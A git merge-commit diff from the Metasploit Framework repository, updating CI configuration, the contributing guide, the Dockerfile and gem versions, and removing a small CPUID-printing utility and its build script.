Merge branch 'master' into consul_exec
commit
08541cd7b9
|
@ -5,6 +5,8 @@ docker-compose*.yml
|
|||
docker/
|
||||
!docker/msfconsole.rc
|
||||
!docker/entrypoint.sh
|
||||
!docker/database.yml
|
||||
Dockerfile
|
||||
README.md
|
||||
.git/
|
||||
.github/
|
||||
|
|
|
@ -1 +1 @@
|
|||
2.5.1
|
||||
2.5.3
|
||||
|
|
21
.travis.yml
21
.travis.yml
|
@ -11,9 +11,9 @@ addons:
|
|||
- graphviz
|
||||
language: ruby
|
||||
rvm:
|
||||
- '2.3.7'
|
||||
- '2.4.4'
|
||||
- '2.5.1'
|
||||
- '2.3.8'
|
||||
- '2.4.5'
|
||||
- '2.5.3'
|
||||
|
||||
env:
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||
|
@ -24,19 +24,22 @@ env:
|
|||
matrix:
|
||||
fast_finish: true
|
||||
exclude:
|
||||
- rvm: '2.3.7'
|
||||
- rvm: '2.3.8'
|
||||
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
- rvm: '2.4.4'
|
||||
- rvm: '2.4.5'
|
||||
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
|
||||
jobs:
|
||||
# build docker image
|
||||
include:
|
||||
- env: CMD="docker-compose build" DOCKER="true"
|
||||
- env: CMD="/usr/bin/docker-compose build" DOCKER="true"
|
||||
# we do not need any setup
|
||||
before_install: skip
|
||||
install: skip
|
||||
before_script: skip
|
||||
before_script:
|
||||
- curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
|
||||
- chmod +x docker-compose
|
||||
- sudo mv docker-compose /usr/bin
|
||||
before_install:
|
||||
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
|
||||
- rake --version
|
||||
|
@ -56,7 +59,9 @@ before_script:
|
|||
script:
|
||||
- echo "${CMD}"
|
||||
# we need travis_wait because the Docker build job can take longer than 10 minutes
|
||||
- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
|
||||
#- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
|
||||
# docker_wait is currently broken on travis-ci, so let's just run CMD directly for now
|
||||
- bash -c "${CMD}"
|
||||
|
||||
notifications:
|
||||
irc: "irc.freenode.org#msfnotify"
|
||||
|
|
|
@ -37,7 +37,7 @@ when an individual is representing the project or its community.
|
|||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported by contacting the project maintainers at msfdev@metasploit.com. If
|
||||
the incident involves a committer, you may report directly to
|
||||
egypt@metasploit.com or todb@metasploit.com.
|
||||
caitlin_condon@rapid7.com or todb@metasploit.com.
|
||||
|
||||
All complaints will be reviewed and investigated and will result in a
|
||||
response that is deemed necessary and appropriate to the circumstances.
|
||||
|
|
114
CONTRIBUTING.md
114
CONTRIBUTING.md
|
@ -1,82 +1,54 @@
|
|||
# Hello, World!
|
||||
|
||||
Thanks for your interest in making Metasploit -- and therefore, the
|
||||
world -- a better place!
|
||||
|
||||
Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
|
||||
Please try to be as specific as you can about your problem; include steps
|
||||
to reproduce (cut and paste from your console output if it's helpful) and
|
||||
what you were expecting to happen.
|
||||
|
||||
Are you about to report a security vulnerability in Metasploit itself?
|
||||
How ironic! Please take a look at Rapid7's [Vulnerability
|
||||
Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
|
||||
your report to security@rapid7.com using our [PGP key].
|
||||
|
||||
Are you about to contribute some new functionality, a bug fix, or a new
|
||||
Metasploit module? If so, read on...
|
||||
world -- a better place! Before you get started, review our
|
||||
[Code of Conduct]. There are mutliple ways to help beyond just writing code:
|
||||
- [Submit bugs and feature requests] with detailed information about your issue or idea.
|
||||
- [Help fellow users with open issues] or [help fellow committers test recent pull requests].
|
||||
- [Report a security vulnerability in Metasploit itself] to Rapid7.
|
||||
- Submit an updated or brand new module! We are always eager for exploits, scanners, and new
|
||||
integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
|
||||
|
||||
# Contributing to Metasploit
|
||||
|
||||
What you see here in CONTRIBUTING.md is a bullet point list of the do's
|
||||
and don'ts of how to make sure *your* valuable contributions actually
|
||||
make it into Metasploit's master branch.
|
||||
|
||||
If you care not to follow these rules, your contribution **will** be
|
||||
closed. Sorry!
|
||||
|
||||
This is intended to be a **short** list. The [wiki] is much more
|
||||
exhaustive and reveals many mysteries. If you read nothing else, take a
|
||||
look at the standard [development environment setup] guide
|
||||
and Metasploit's [Common Coding Mistakes].
|
||||
Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
|
||||
it into Metasploit's master branch. If you do not care to follow these rules, your contribution
|
||||
**will** be closed. Sorry!
|
||||
|
||||
## Code Contributions
|
||||
|
||||
* **Do** stick to the [Ruby style guide].
|
||||
* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
|
||||
* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
|
||||
* **Do** follow the [50/72 rule] for Git commit messages.
|
||||
* **Don't** use the default merge messages when merging from other branches.
|
||||
* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
|
||||
* **Do** create a [topic branch] to work on instead of working directly on `master`.
|
||||
If you do not send a PR from a topic branch, the history of your PR will be
|
||||
lost as soon as you update your own master branch. See
|
||||
https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
|
||||
this in action.
|
||||
|
||||
* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
|
||||
history of your pull request. See [PR#8000] for an example of losing commit history as soon as
|
||||
you update your own master branch.
|
||||
|
||||
### Pull Requests
|
||||
|
||||
* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
|
||||
* **Do** target your pull request to the **master branch**.
|
||||
* **Do** specify a descriptive title to make searching for your pull request easier.
|
||||
* **Do** include [console output], especially for witnessable effects in `msfconsole`.
|
||||
* **Do** list [verification steps] so your code is testable.
|
||||
* **Do** [reference associated issues] in your pull request description.
|
||||
* **Do** write [release notes] once a pull request is landed.
|
||||
* **Don't** leave your pull request description blank.
|
||||
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
|
||||
|
||||
Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
|
||||
Pull request [PR#9966] is a good example to follow.
|
||||
|
||||
#### New Modules
|
||||
|
||||
* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
|
||||
- It would be even better to set up `msftidy.rb` as a [pre-commit hook].
|
||||
* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
|
||||
* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
|
||||
* **Do** use the many module mixin [API]s.
|
||||
* **Don't** include more than one module per pull request.
|
||||
* **Do** include instructions on how to setup the vulnerable environment or software.
|
||||
* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
|
||||
|
||||
|
||||
|
||||
#### Scripts
|
||||
|
||||
* **Don't** submit new [scripts]. Scripts are shipped as examples for
|
||||
automating local tasks, and anything "serious" can be done with post
|
||||
modules and local exploits.
|
||||
* **Do** include [Module Documentation] showing sample run-throughs.
|
||||
* **Don't** submit new [scripts]. Scripts are shipped as examples for automating local tasks, and
|
||||
anything "serious" can be done with post modules and local exploits.
|
||||
|
||||
#### Library Code
|
||||
|
||||
* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
|
||||
* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
|
||||
* **Do** follow [Better Specs] - it's like the style guide for specs.
|
||||
* **Do** write [YARD] documentation - this makes it easier for people to use your code.
|
||||
* **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
|
||||
|
@ -84,44 +56,46 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
|
|||
#### Bug Fixes
|
||||
|
||||
* **Do** include reproduction steps in the form of verification steps.
|
||||
* **Do** include a link to any corresponding [Issues] in the format of
|
||||
`See #1234` in your commit description.
|
||||
* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
|
||||
|
||||
## Bug Reports
|
||||
|
||||
* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
|
||||
Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security).
|
||||
|
||||
When reporting Metasploit issues:
|
||||
* **Do** write a detailed description of your bug and use a descriptive title.
|
||||
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
|
||||
* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
|
||||
* **Don't** file duplicate reports; search for your bug before filing a new report.
|
||||
|
||||
If you need some more guidance, talk to the main body of open
|
||||
source contributors over on the [Freenode IRC channel],
|
||||
or e-mail us at the [metasploit-hackers] mailing list.
|
||||
If you need some more guidance, talk to the main body of open source contributors over on our
|
||||
[Metasploit Slack] or [#metasploit on Freenode IRC].
|
||||
|
||||
Also, **thank you** for taking the few moments to read this far! You're
|
||||
already way ahead of the curve, so keep it up!
|
||||
Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
|
||||
curve, so keep it up!
|
||||
|
||||
[Issue Tracker]:http://r-7.co/MSF-BUGv1
|
||||
[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
|
||||
[wiki]:https://github.com/rapid7/metasploit-framework/wiki
|
||||
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
|
||||
[development environment setup]:http://r-7.co/MSF-DEV
|
||||
[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
|
||||
[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
|
||||
[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
|
||||
[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||
[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
|
||||
[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
|
||||
[development environment]:http://r-7.co/MSF-DEV
|
||||
[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
|
||||
[Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
|
||||
[Rubocop]:https://rubygems.org/search?query=rubocop
|
||||
[50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
|
||||
[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
|
||||
[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
|
||||
[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
|
||||
[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
|
||||
[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
|
||||
[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
|
||||
[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
|
||||
[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
|
||||
[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
|
||||
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
|
||||
[API]:https://rapid7.github.io/metasploit-framework/api
|
||||
[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
|
||||
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
|
||||
[RSpec]:http://rspec.info
|
||||
[Better Specs]:http://betterspecs.org
|
||||
[YARD]:http://yardoc.org
|
||||
[Issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||
[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
|
||||
[Metasploit Slack]:https://www.metasploit.com/slack
|
||||
[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||
|
|
54
Dockerfile
54
Dockerfile
|
@ -1,31 +1,17 @@
|
|||
FROM ruby:2.5.1-alpine3.7
|
||||
FROM ruby:2.5.3-alpine3.7 AS builder
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||
ENV APP_HOME /usr/src/metasploit-framework/
|
||||
ENV NMAP_PRIVILEGED=""
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV BUNDLE_IGNORE_MESSAGES="true"
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
|
||||
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
|
||||
COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
|
||||
COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
|
||||
COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
|
||||
|
||||
RUN apk update && \
|
||||
apk add \
|
||||
bash \
|
||||
sqlite-libs \
|
||||
nmap \
|
||||
nmap-scripts \
|
||||
nmap-nselibs \
|
||||
postgresql-libs \
|
||||
python \
|
||||
python3 \
|
||||
ncurses \
|
||||
libcap \
|
||||
su-exec \
|
||||
&& apk add --virtual .ruby-builddeps \
|
||||
RUN apk add --no-cache \
|
||||
autoconf \
|
||||
bison \
|
||||
build-base \
|
||||
|
@ -44,20 +30,38 @@ RUN apk update && \
|
|||
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
||||
&& gem update --system \
|
||||
&& gem install bundler \
|
||||
&& bundle install --system $BUNDLER_ARGS \
|
||||
&& apk del .ruby-builddeps \
|
||||
&& rm -rf /var/cache/apk/*
|
||||
&& bundle install --clean --no-cache --system $BUNDLER_ARGS \
|
||||
# temp fix for https://github.com/bundler/bundler/issues/6680
|
||||
&& rm -rf /usr/local/bundle/cache \
|
||||
# needed so non root users can read content of the bundle
|
||||
&& chmod -R a+r /usr/local/bundle
|
||||
|
||||
|
||||
FROM ruby:2.5.3-alpine3.7
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV NMAP_PRIVILEGED=""
|
||||
ENV METASPLOIT_GROUP=metasploit
|
||||
|
||||
# used for the copy command
|
||||
RUN addgroup -S $METASPLOIT_GROUP
|
||||
|
||||
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
|
||||
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
|
||||
|
||||
ADD ./ $APP_HOME
|
||||
COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
|
||||
COPY --chown=root:metasploit . $APP_HOME/
|
||||
RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
|
||||
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
# we need this entrypoint to dynamically create a user
|
||||
# matching the hosts UID and GID so we can mount something
|
||||
# from the users home directory. If the IDs don't match
|
||||
# it results in access denied errors. Once docker has
|
||||
# a solution for this we can revert it back to normal
|
||||
# it results in access denied errors.
|
||||
ENTRYPOINT ["docker/entrypoint.sh"]
|
||||
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]
|
||||
|
|
112
Gemfile.lock
112
Gemfile.lock
|
@ -9,7 +9,10 @@ PATH
|
|||
bcrypt
|
||||
bcrypt_pbkdf
|
||||
bit-struct
|
||||
concurrent-ruby (= 1.0.5)
|
||||
dnsruby
|
||||
ed25519
|
||||
em-http-request
|
||||
faker
|
||||
filesize
|
||||
jsobfu
|
||||
|
@ -18,9 +21,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.3.40)
|
||||
metasploit-payloads (= 1.3.56)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.4.1)
|
||||
metasploit_payloads-mettle (= 0.5.0)
|
||||
mqtt
|
||||
msgpack
|
||||
nessus_rest
|
||||
|
@ -78,27 +81,27 @@ GEM
|
|||
remote: https://rubygems.org/
|
||||
specs:
|
||||
Ascii85 (1.0.3)
|
||||
actionpack (4.2.10)
|
||||
actionview (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
actionpack (4.2.11)
|
||||
actionview (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
rack (~> 1.6)
|
||||
rack-test (~> 0.6.2)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||
actionview (4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
actionview (4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
builder (~> 3.1)
|
||||
erubis (~> 2.7.0)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.3)
|
||||
activemodel (4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
activemodel (4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
builder (~> 3.1)
|
||||
activerecord (4.2.10)
|
||||
activemodel (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
activerecord (4.2.11)
|
||||
activemodel (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
arel (~> 6.0)
|
||||
activesupport (4.2.10)
|
||||
activesupport (4.2.11)
|
||||
i18n (~> 0.7)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
|
@ -107,42 +110,53 @@ GEM
|
|||
public_suffix (>= 2.0.2, < 4.0)
|
||||
afm (0.2.2)
|
||||
arel (6.0.4)
|
||||
arel-helpers (2.7.0)
|
||||
arel-helpers (2.8.0)
|
||||
activerecord (>= 3.1.0, < 6)
|
||||
backports (3.11.3)
|
||||
backports (3.11.4)
|
||||
bcrypt (3.1.12)
|
||||
bcrypt_pbkdf (1.0.0)
|
||||
bindata (2.4.3)
|
||||
bindata (2.4.4)
|
||||
bit-struct (0.16)
|
||||
builder (3.2.3)
|
||||
coderay (1.1.2)
|
||||
concurrent-ruby (1.0.5)
|
||||
cookiejar (0.3.3)
|
||||
crass (1.0.4)
|
||||
daemons (1.2.6)
|
||||
daemons (1.3.0)
|
||||
diff-lcs (1.3)
|
||||
dnsruby (1.61.2)
|
||||
addressable (~> 2.5)
|
||||
docile (1.3.1)
|
||||
ed25519 (1.2.4)
|
||||
em-http-request (1.1.5)
|
||||
addressable (>= 2.3.4)
|
||||
cookiejar (!= 0.3.1)
|
||||
em-socksify (>= 0.3)
|
||||
eventmachine (>= 1.0.3)
|
||||
http_parser.rb (>= 0.6.0)
|
||||
em-socksify (0.3.2)
|
||||
eventmachine (>= 1.0.0.beta.4)
|
||||
erubis (2.7.0)
|
||||
eventmachine (1.2.7)
|
||||
factory_bot (4.10.0)
|
||||
factory_bot (4.11.1)
|
||||
activesupport (>= 3.0.0)
|
||||
factory_bot_rails (4.10.0)
|
||||
factory_bot (~> 4.10.0)
|
||||
factory_bot_rails (4.11.1)
|
||||
factory_bot (~> 4.11.1)
|
||||
railties (>= 3.0.0)
|
||||
faker (1.9.1)
|
||||
i18n (>= 0.7)
|
||||
faraday (0.15.2)
|
||||
faraday (0.15.4)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
filesize (0.1.1)
|
||||
filesize (0.2.0)
|
||||
fivemat (1.3.7)
|
||||
hashery (2.1.2)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jsobfu (0.4.2)
|
||||
rkelly-remix
|
||||
json (2.1.0)
|
||||
loofah (2.2.2)
|
||||
loofah (2.2.3)
|
||||
crass (~> 1.0.2)
|
||||
nokogiri (>= 1.5.9)
|
||||
metasm (1.0.3)
|
||||
|
@ -150,7 +164,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-credential (3.0.1)
|
||||
metasploit-credential (3.0.2)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models (>= 3.0.0)
|
||||
|
@ -164,8 +178,8 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.3.40)
|
||||
metasploit_data_models (3.0.0)
|
||||
metasploit-payloads (1.3.56)
|
||||
metasploit_data_models (3.0.2)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
arel-helpers
|
||||
|
@ -175,8 +189,8 @@ GEM
|
|||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.4.1)
|
||||
method_source (0.9.0)
|
||||
metasploit_payloads-mettle (0.5.0)
|
||||
method_source (0.9.2)
|
||||
mini_portile2 (2.3.0)
|
||||
minitest (5.11.3)
|
||||
mqtt (0.5.0)
|
||||
|
@ -186,9 +200,9 @@ GEM
|
|||
net-ssh (5.0.2)
|
||||
network_interface (0.0.2)
|
||||
nexpose (7.2.1)
|
||||
nokogiri (1.8.4)
|
||||
nokogiri (1.8.5)
|
||||
mini_portile2 (~> 2.3.0)
|
||||
octokit (4.9.0)
|
||||
octokit (4.13.0)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
openvas-omp (0.0.4)
|
||||
|
@ -208,11 +222,11 @@ GEM
|
|||
activerecord (~> 4.0)
|
||||
arel (>= 4.0.1)
|
||||
pg_array_parser (~> 0.0.9)
|
||||
pry (0.11.3)
|
||||
pry (0.12.2)
|
||||
coderay (~> 1.1.0)
|
||||
method_source (~> 0.9.0)
|
||||
public_suffix (3.0.2)
|
||||
rack (1.6.10)
|
||||
public_suffix (3.0.3)
|
||||
rack (1.6.11)
|
||||
rack-protection (1.5.5)
|
||||
rack
|
||||
rack-test (0.6.3)
|
||||
|
@ -225,19 +239,19 @@ GEM
|
|||
rails-deprecated_sanitizer (>= 1.0.1)
|
||||
rails-html-sanitizer (1.0.4)
|
||||
loofah (~> 2.2, >= 2.2.2)
|
||||
railties (4.2.10)
|
||||
actionpack (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
railties (4.2.11)
|
||||
actionpack (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rake (12.3.1)
|
||||
rake (12.3.2)
|
||||
rb-readline (0.5.5)
|
||||
recog (2.1.20)
|
||||
recog (2.1.36)
|
||||
nokogiri
|
||||
redcarpet (3.4.0)
|
||||
rex-arch (0.1.13)
|
||||
rex-text
|
||||
rex-bin_tools (0.1.4)
|
||||
rex-bin_tools (0.1.6)
|
||||
metasm
|
||||
rex-arch
|
||||
rex-core
|
||||
|
@ -288,13 +302,13 @@ GEM
|
|||
rspec-mocks (~> 3.8.0)
|
||||
rspec-core (3.8.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-expectations (3.8.1)
|
||||
rspec-expectations (3.8.2)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-mocks (3.8.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-rails (3.8.0)
|
||||
rspec-rails (3.8.1)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
railties (>= 3.0)
|
||||
|
@ -305,14 +319,14 @@ GEM
|
|||
rspec-rerun (1.1.0)
|
||||
rspec (~> 3.0)
|
||||
rspec-support (3.8.0)
|
||||
ruby-macho (2.0.0)
|
||||
ruby-macho (2.1.0)
|
||||
ruby-rc4 (0.1.5)
|
||||
ruby_smb (1.0.3)
|
||||
ruby_smb (1.0.5)
|
||||
bindata
|
||||
rubyntlm
|
||||
windows_error
|
||||
rubyntlm (0.6.2)
|
||||
rubyzip (1.2.1)
|
||||
rubyzip (1.2.2)
|
||||
sawyer (0.8.1)
|
||||
addressable (>= 2.3.5, < 2.6)
|
||||
faraday (~> 0.8, < 1.0)
|
||||
|
@ -333,14 +347,14 @@ GEM
|
|||
daemons (~> 1.0, >= 1.0.9)
|
||||
eventmachine (~> 1.0, >= 1.0.4)
|
||||
rack (>= 1, < 3)
|
||||
thor (0.20.0)
|
||||
thor (0.20.3)
|
||||
thread_safe (0.3.6)
|
||||
tilt (2.0.8)
|
||||
tilt (2.0.9)
|
||||
timecop (0.9.1)
|
||||
ttfunk (1.5.1)
|
||||
tzinfo (1.2.5)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo-data (1.2018.5)
|
||||
tzinfo-data (1.2018.7)
|
||||
tzinfo (>= 1.0.0)
|
||||
warden (1.2.7)
|
||||
rack (>= 1.0)
|
||||
|
@ -349,7 +363,7 @@ GEM
|
|||
activemodel (>= 4.2.7)
|
||||
activesupport (>= 4.2.7)
|
||||
xmlrpc (0.3.0)
|
||||
yard (0.9.15)
|
||||
yard (0.9.16)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
@ -370,4 +384,4 @@ DEPENDENCIES
|
|||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
1.16.3
|
||||
1.16.6
|
||||
|
|
6
LICENSE
6
LICENSE
|
@ -71,10 +71,6 @@ Files: lib/anemone.rb lib/anemone/*
|
|||
Copyright: 2009 Vertive, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
|
||||
Copyright: 2006-2010 Yoann GUILLOT
|
||||
License: LGPL-2.1
|
||||
|
||||
Files: lib/msf/core/modules/external/python/async_timeout/*
|
||||
Copyright: 2016-2017 Andrew Svetlov
|
||||
License: Apache 2.0
|
||||
|
@ -115,7 +111,7 @@ Files: data/webcam/api.js
|
|||
Copyright: Copyright 2013 Muaz Khan<@muazkh>.
|
||||
License: MIT
|
||||
|
||||
Files: lib/msf/core/db_manager/http/public/*, lib/msf/core/db_manager/http/views/api_docs.erb
|
||||
Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
|
||||
Copyright: Copyright 2018 SmartBear Software
|
||||
License: Apache 2.0
|
||||
|
||||
|
|
|
@ -1,11 +0,0 @@
|
|||
#!/bin/sh
|
||||
|
||||
gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
|
||||
strip cpuinfo.ia32.bin && \
|
||||
gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
|
||||
strip cpuinfo.ia64.bin && \
|
||||
i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
|
||||
strip cpuinfo.exe
|
||||
|
||||
ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
|
||||
|
|
@ -1,64 +0,0 @@
|
|||
// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
|
||||
|
||||
/*
|
||||
#!/usr/bin/env ruby
|
||||
# This file is part of Metasm, the Ruby assembly manipulation suite
|
||||
# Copyright (C) 2006-2009 Yoann GUILLOT
|
||||
#
|
||||
# Licence is LGPL, see LICENCE in the top-level directory
|
||||
|
||||
|
||||
#
|
||||
# this sample shows the compilation of a slightly more complex program
|
||||
# it displays in a messagebox the result of CPUID
|
||||
#
|
||||
|
||||
*/
|
||||
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
|
||||
static char *featureinfo[32] = {
|
||||
"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
|
||||
"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
|
||||
"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
|
||||
"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
|
||||
}, *extendinfo[32] = {
|
||||
"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
|
||||
"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
|
||||
"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
|
||||
"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
|
||||
};
|
||||
|
||||
#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
|
||||
#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
|
||||
int main(void)
|
||||
{
|
||||
|
||||
unsigned long eax, ebx, ecx, edx;
|
||||
unsigned long i;
|
||||
|
||||
cpuid(0);
|
||||
fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
|
